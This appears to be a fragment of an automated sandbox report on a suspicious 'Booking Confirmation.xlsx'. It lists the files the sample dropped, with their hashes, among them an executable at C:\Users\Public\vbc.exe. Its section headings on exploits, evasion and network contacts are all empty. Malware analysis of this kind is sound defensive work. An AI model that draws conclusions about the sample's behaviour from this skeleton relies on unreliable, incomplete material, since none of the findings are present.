C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5867438.png	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced	4141C7515CE64FED13BE6D2BA33299AA	B290F533537A734B7030CE1269AC8C5398754194	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE03F06.png	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced	16925690E9B366EA60B610F517789AF1	9F3FE15AE44644F9ED8C2CA668B7020DF726426B	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1192904.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D602AD35.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D952E9B2.png	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced	4141C7515CE64FED13BE6D2BA33299AA	B290F533537A734B7030CE1269AC8C5398754194	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA8A5653.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4B4CA0B.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7B97C3D.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	955A9E08DFD3A0E31C7BCF66F9519FFC	F677467423105ACF39B76CB366F08152527052B3	08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
C:\Users\user\Desktop\~$Booking Confirmation.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EE83942376EA5717149517FCC832AB9F	EC75B10C6EF046CB63EAA20470AC94529FB4873A	B3498937A71913D7101FAFB04EB48A791106BEC97E21839B2E1BE8BB55A3F5FC

Analysis Report Booking Confirmation.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs